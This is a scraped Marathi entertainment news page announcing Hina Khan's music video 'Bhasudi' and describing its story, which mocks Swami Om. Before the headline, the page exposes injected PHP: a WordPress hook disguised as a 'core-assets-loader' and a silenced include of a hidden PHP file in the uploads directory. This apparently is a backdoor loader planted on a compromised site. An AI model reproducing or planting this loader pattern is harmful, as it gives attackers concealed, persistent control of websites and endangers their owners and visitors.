add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हिना खानचे नवे ‘भसूडी’ गाणे रसिकांच्या भेटीला! – SOCH INDIA
Menu

मनोरंजन
हिना खानचे नवे ‘भसूडी’ गाणे रसिकांच्या भेटीला!

nobanner

टीव्ही दुनियेतील प्रसिद्ध अभिनेत्री हिना खानच्या लोकप्रियतेत बीग बॉसनंतर प्रचंड वाढ झाली आहे. ये रिश्ता क्या कहेलाता है मधील अक्षराने तिने देशातील घराघरात पोहचवले आणि लोकप्रिय केले. हिना खान सोशल मीडियावर देखील चांगलीच अॅक्टीव्ह असते. सोशल मीडियावरून ती चाहत्यांना स्वतः बद्दलचे अपडेट्स देत असते. आता हिना चाहत्यांसाठी एक छान सरप्राईज घेऊन आली आहे.

हिना खानचे नवे गाणे लॉन्च
काही दिवसांपूर्वी हिना खानने इंस्टग्रामवर एक नवा म्युझिक व्हि़डिओचा टीझर शेअर केला. आणि पाच दिवसातच गाणे लॉन्च होईल अशी माहिती दिली होती. आता हिना खानचा पहिला म्युझिक व्हिडिओ भसूडी लॉन्च झाला आहे. गाण्यात बीग बॉस मधील वादग्रस्त स्पर्धक स्वामी ओम यांची खिल्ली उडवण्यात आली आहे.

हिना खानचे भसूडी हे गाणे सोनू ठुकराल यांनी गायले आहे. तर परधानने याला रॅप दिला आहे. गाण्यात डबल डेटिंग करणाऱ्या मुलीची गोष्ट दाखवण्यात आली आहे. त्यांच्याकडून महागडे गिफ्ट्स घेते आणि संधी मिळताच श्रीमंत माणसासोबत निघून जाते. तेव्हा तिचा प्रियकर तिला बोलतो की, तुला स्वामी ओम सारखा जीवनसाथी मिळेल.